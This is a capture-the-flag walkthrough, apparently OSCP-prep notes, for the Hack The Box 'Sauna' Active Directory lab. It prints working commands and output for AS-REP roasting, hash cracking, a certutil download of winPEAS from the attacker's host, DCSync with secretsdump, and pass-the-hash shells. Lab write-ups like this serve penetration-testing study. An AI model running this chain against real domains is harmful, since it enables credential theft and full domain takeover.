HTB Sauna done
Sauna¶
OS:¶
Windows
Technology:¶
Active Directory
IP Address:¶
10.10.10.175
Open ports:¶
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-04-19 17:06:28Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49676/tcp open msrpc Microsoft Windows RPC
49698/tcp open msrpc Microsoft Windows RPC
49722/tcp open msrpc Microsoft Windows RPC
Users and passwords:¶
EGOTISTICALBANK\fsmith
Thestrokes23
EGOTISTICALBANK\svc_loanmgr (the Winlogon autologon entry spells it svc_loanmanager, but svc_loanmgr is the account that exists)
Moneymakestheworldgoround!
Nmap¶
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Sauna]
└─$ sudo nmap -Pn -A -sV --script=default,vuln -p- --open -oA 10.10.10.175_nmap_vulns 10.10.10.175
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-19 06:04 EDT
Nmap scan report for 10.10.10.175
Host is up (0.041s latency).
Not shown: 65517 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Egotistical Bank :: Home
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.10.175
| Found the following possible CSRF vulnerabilities:
|
| Path: http://10.10.10.175:80/
| Form id: email
| Form action: #
|
| Path: http://10.10.10.175:80/contact.html
| Form id:
| Form action: #
|
| Path: http://10.10.10.175:80/single.html
| Form id:
| Form action: #
|
| Path: http://10.10.10.175:80/single.html
| Form id:
| Form action: #
|
| Path: http://10.10.10.175:80/index.html
| Form id: email
| Form action: #
|
| Path: http://10.10.10.175:80/about.html
| Form id: email
|_ Form action: #
|_http-server-header: Microsoft-IIS/10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-04-19 17:06:28Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-title: Not Found
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49676/tcp open msrpc Microsoft Windows RPC
49698/tcp open msrpc Microsoft Windows RPC
49722/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
| smb2-time:
| date: 2023-04-19T17:07:31
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
|_clock-skew: 7h00m00s
TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
1 43.03 ms 10.10.14.1
2 43.24 ms 10.10.10.175
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 451.97 seconds
Add record to /etc/hosts¶
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Sauna]
└─$ sudo -i
[sudo] password for kali:
┌──(root㉿kali)-[~]
└─# echo "10.10.10.175 egotistical-bank.local" >> /etc/hosts
# Kerberos-only tooling also wants the DC's FQDN, sauna.egotistical-bank.local (it shows up in the BloodHound output further down); add it to the same line.
Scanning using ffuf¶
ffuf -u http://egotistical-bank.local/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -recursion -recursion-depth=2 -o egotistical-bank.local_ffuz -of all -e .php,.html,.txt,.bac,.backup
Generating usernames using username-anarchy¶
1) Open the website http://egotistical-bank.local/about.html and collect the staff names listed there.
2) Save the full names, one per line:
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Sauna]
└─$ cat full_name_from_website.txt
Fergus Smith
Shaun Coins
Hugo Bear
Bowie Taylor
Sophie Driver
Steven Kerb
3) Generate username candidates with "username-anarchy", keeping only the formats an AD admin is likely to use:
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Sauna]
└─$ git clone https://github.com/urbanadventurer/username-anarchy.git
Cloning into 'username-anarchy'...
remote: Enumerating objects: 386, done.
remote: Total 386 (delta 0), reused 0 (delta 0), pack-reused 386
Receiving objects: 100% (386/386), 16.76 MiB | 8.79 MiB/s, done.
Resolving deltas: 100% (127/127), done.
Updating files: 100% (112/112), done.
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Sauna]
└─$ cp -r username-anarchy /tmp
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Sauna]
└─$ cd /tmp/username-anarchy
┌──(kali㉿kali)-[/tmp/username-anarchy]
└─$ chmod a+x username-anarchy
┌──(kali㉿kali)-[/tmp/username-anarchy]
└─$ ./username-anarchy --input-file /mnt/hgfs/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Sauna/full_name_from_website.txt --select-format first,flast,first.last,firstl > /mnt/hgfs/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Sauna/full_name_from_website_aliases.txt
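The same alias generation without the Ruby tool, as an added Python example (not part of the original writeup or of username-anarchy): it builds the four formats selected above plus a few other common AD conventions, normalises each name so the result is a valid logon token, and de-duplicates. The format names mirror username-anarchy's; the extra ones (last, firstlast, f.last, lastf) are this example's own choice, not tool output.

```python
"""Candidate AD usernames from full names, in username-anarchy style formats."""
import re

# (first, last) -> candidate. Lowercased because AD logons are case-insensitive
# and the list is fed straight to GetNPUsers / kerbrute.
FORMATS = {
    "first":      lambda f, l: f,
    "last":       lambda f, l: l,
    "flast":      lambda f, l: f[0] + l,
    "firstl":     lambda f, l: f + l[0],
    "first.last": lambda f, l: f + "." + l,
    "firstlast":  lambda f, l: f + l,
    "f.last":     lambda f, l: f[0] + "." + l,
    "lastf":      lambda f, l: l + f[0],
}


def split_name(full_name: str):
    """'Fergus Smith' -> ('fergus', 'smith'). Middle names are dropped and
    apostrophes/hyphens stripped so every candidate is a plain sAMAccountName token."""
    parts = [re.sub(r"[^a-z0-9]", "", p.lower()) for p in full_name.split()]
    parts = [p for p in parts if p]
    if len(parts) < 2:
        raise ValueError(f"need a first and a last name: {full_name!r}")
    return parts[0], parts[-1]


def generate_aliases(full_names, formats):
    """Candidates for every name in every requested format, de-duplicated, order kept."""
    seen, out = set(), []
    for name in full_names:
        first, last = split_name(name)
        for fmt in formats:
            alias = FORMATS[fmt](first, last)
            if alias not in seen:
                seen.add(alias)
                out.append(alias)
    return out


if __name__ == "__main__":
    # The names collected from about.html on the page.
    names = ["Fergus Smith", "Shaun Coins", "Hugo Bear",
             "Bowie Taylor", "Sophie Driver", "Steven Kerb"]
    for alias in generate_aliases(names, ["first", "flast", "first.last", "firstl"]):
        print(alias)
```

Redirect the output to a file and pass it to GetNPUsers.py with -usersfile; the order of formats matters only for readability, since every candidate is tried anyway.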
ASREPRoasting Attacks¶
# Ask the KDC for an AS-REP for each candidate. Only accounts that exist AND have "Do not require Kerberos preauthentication" set return a crackable blob; everything else errors out. GetNPUsers.py can also take the whole list at once with -usersfile <file> -format hashcat -outputfile <file> instead of this loop.
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Sauna]
└─$ while read as; do python3 /home/kali/.local/bin/GetNPUsers.py egotistical-bank.local/"$as" -request -no-pass -dc-ip 10.10.10.175 >> full_name_hashes.txt; done < full_name_from_website_aliases.txt
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Sauna]
└─$ cat full_name_hashes.txt | grep -B2 krb
[*] Getting TGT for fsmith
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:6ea7a1278aa45a25f95a57270345cfa0$e843b245eb76974feccdaf8c29a9b401886cfbc2ac973bf74abf5136d3e03eec2f77cffec7d36962e3136de4df23b3076c6e602e2f431a8c15f911c402141115421bcc04f34c48fb03e39459dc87b4ccfb34da1f688cc40f13ad24272f1d38e850337184552ec3dd04807dffd2a8bdaf91878198782c29d6f4f7e455f3d4e377b18ef7f84a5a7b875232aaf9326494e525df73fceca79b751fc5b2cb132a1f9e0cf77b92089fc09afd6a11cdee0f423a6da5aec4993607324baaad40a5ad6424dcf52bdafede5bd51ca13db8cef19db3c28b95a238e85d6ac6a53c308a44e90f72340de530318078a4932908074b1b2925d330ad3f65a7c1b037ca2de34e7287
Cracking hash¶
# Save the $krb5asrep line from full_name_hashes.txt as fsmith_hash.txt and crack it with mode 18200 (Kerberos 5, etype 23, AS-REP). --show only prints entries already in hashcat's potfile, so run the same command without --show first.
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Sauna]
└─$ hashcat -m 18200 fsmith_hash.txt /usr/share/wordlists/rockyou.txt --show
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:6ea7a1278aa45a25f95a57270345cfa0$...:Thestrokes23
Read flag: user.txt¶
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Sauna]
└─$ evil-winrm -i 10.10.10.175 -u fsmith -p Thestrokes23
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\FSmith\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\FSmith\Desktop> dir
Directory: C:\Users\FSmith\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 4/20/2023 11:11 AM 34 user.txt
*Evil-WinRM* PS C:\Users\FSmith\Desktop> type user.txt
5e7d04fc8d0e2c5d7b2b46d3b99143a9
Run winPEAS.bat¶
# Share winPEAS.bat - Kali
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Sauna]
└─$ wget https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/winPEASbat/winPEAS.bat
--2023-04-21 07:34:54-- https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/winPEASbat/winPEAS.bat
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.108.133, 185.199.110.133, 185.199.111.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.108.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 35294 (34K) [text/plain]
Saving to: ‘winPEAS.bat’
winPEAS.bat 100%[==============================================>] 34.47K --.-KB/s in 0.03s
2023-04-21 07:34:54 (1.13 MB/s) - ‘winPEAS.bat’ saved [35294/35294]
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Sauna]
└─$ python2 -m SimpleHTTPServer 8888
Serving HTTP on 0.0.0.0 port 8888 ...
# Download winPEAS.bat - Windows
*Evil-WinRM* PS C:\Users\FSmith\Desktop> certutil -urlcache -split -f http://10.10.14.20:8888/winPEAS.bat winPEAS.bat
**** Online ****
0000 ...
89de
CertUtil: -URLCache command completed successfully.
# Run winPEAS.bat - Windows
*Evil-WinRM* PS C:\Users\FSmith\Desktop> cmd.exe /C winPEAS.bat
Volume in drive C has no label.
Volume Serial Number is 489C-D8FC
[+] GPP Password
[+] Cloud Credentials
[+] AppCmd
[?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#appcmd-exe
C:\Windows\system32\inetsrv\appcmd.exe exists.
[+] Files in registry that may contain credentials
[i] Searching specific files that may contains credentials.
[?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#credentials-inside-files
Looking inside HKCU\Software\ORL\WinVNC3\Password
Looking inside HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4/password
Looking inside HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\WinLogon
DefaultDomainName REG_SZ EGOTISTICALBANK
DefaultUserName REG_SZ EGOTISTICALBANK\svc_loanmanager
DefaultPassword REG_SZ Moneymakestheworldgoround!
Looking inside HKLM\SYSTEM\CurrentControlSet\Services\SNMP
# Check all users - Windows (output winPEAS.bat)
[+] USERS
User accounts for \\
-------------------------------------------------------------------------------
Administrator FSmith Guest
HSmith krbtgt svc_loanmgr
The command completed with one or more errors.
...
# Check the svc_loanmgr account. Winlogon's DefaultUserName says svc_loanmanager, but no such account is in the user list above; svc_loanmgr is the one that exists, and the stored password logs in as it.
*Evil-WinRM* PS C:\Users\FSmith\Desktop> net user svc_loanmgr
User name svc_loanmgr
Full Name L Manager
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 1/24/2020 4:48:31 PM
Password expires Never
Password changeable 1/25/2020 4:48:31 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships *Remote Management Users
Global Group memberships *Domain Users
The command completed successfully.
# svc_loanmgr is in "Remote Management Users", so the recovered password gives a WinRM (5985) shell as that account, the same way fsmith was used.
Run Bloodhound (remote)¶
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Sauna]
└─$ cd sauna_bloodhound_output
┌──(kali㉿kali)-[/mnt/…/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Sauna/sauna_bloodhound_output]
└─$ bloodhound-python -u svc_loanmgr -p Moneymakestheworldgoround! -d EGOTISTICAL-BANK.LOCAL -ns 10.10.10.175 -c All
INFO: Found AD domain: egotistical-bank.local
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
# Kerberos rejects the request because Kali's clock is 7 hours off the DC (nmap reported clock-skew: 7h00m00s). The NTLM fallback is enough here, but for Kerberos-only steps sync first (sudo ntpdate 10.10.10.175) or run the tool under faketime.
INFO: Connecting to LDAP server: SAUNA.EGOTISTICAL-BANK.LOCAL
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: SAUNA.EGOTISTICAL-BANK.LOCAL
INFO: Found 7 users
INFO: Found 52 groups
INFO: Found 3 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: SAUNA.EGOTISTICAL-BANK.LOCAL
INFO: Done in 00M 08S
Check "DCSync" rights¶
In BloodHound, the svc_loanmgr node has GetChanges and GetChangesAll edges to the EGOTISTICAL-BANK.LOCAL domain object (the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All extended rights). Holding both lets a non-admin account replicate any user's secrets over DRSUAPI, which is exactly what the DCSync below does.
DCSync attacks¶
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Sauna]
└─$ /home/kali/.local/bin/secretsdump.py egotistical-bank/svc_loanmgr@10.10.10.175 -just-dc-user Administrator
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:42ee4a7abee32410f470fed37ae9660535ac56eeb73928ec783b015d623fc657
Administrator:aes128-cts-hmac-sha1-96:a9f3769c592a8a231c3c972c4050be4e
Administrator:des-cbc-md5:fb8f321c64cea87f
[*] Cleaning up...
Read flag: root.txt¶
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Sauna]
└─$ /usr/share/doc/python3-impacket/examples/psexec.py egotistical-bank.local/administrator@10.10.10.175 -hashes aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Requesting shares on 10.10.10.175.....
[*] Found writable share ADMIN$
[*] Uploading file rwAVLnGM.exe
[*] Opening SVCManager on 10.10.10.175.....
[*] Creating service oMkz on 10.10.10.175.....
[*] Starting service oMkz.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.973]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> dir C:\Users\Administrator\Desktop\
Volume in drive C has no label.
Volume Serial Number is 489C-D8FC
Directory of C:\Users\Administrator\Desktop
07/14/2021 03:35 PM <DIR> .
07/14/2021 03:35 PM <DIR> ..
04/20/2023 11:11 AM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 7,695,089,664 bytes free
C:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt
5354b2936328b5c0ed8c29e0b5080d1d
Bonus: other ways to read the flag¶
# Pass-the-hash with the Administrator NT hash from the secretsdump output above (no cleartext password needed):
wmiexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e' -dc-ip 10.10.10.175 administrator@10.10.10.175
evil-winrm -i 10.10.10.175 -u administrator -H 823452073d75b9d1cf70ebdf86c7f98e
# The same DCSync from the box itself, run in an evil-winrm session as svc_loanmgr (the account holding the replication rights):
.\mimikatz 'lsadump::dcsync /domain:EGOTISTICAL-BANK.LOCAL /user:administrator' exit
References:¶
https://github.com/urbanadventurer/username-anarchy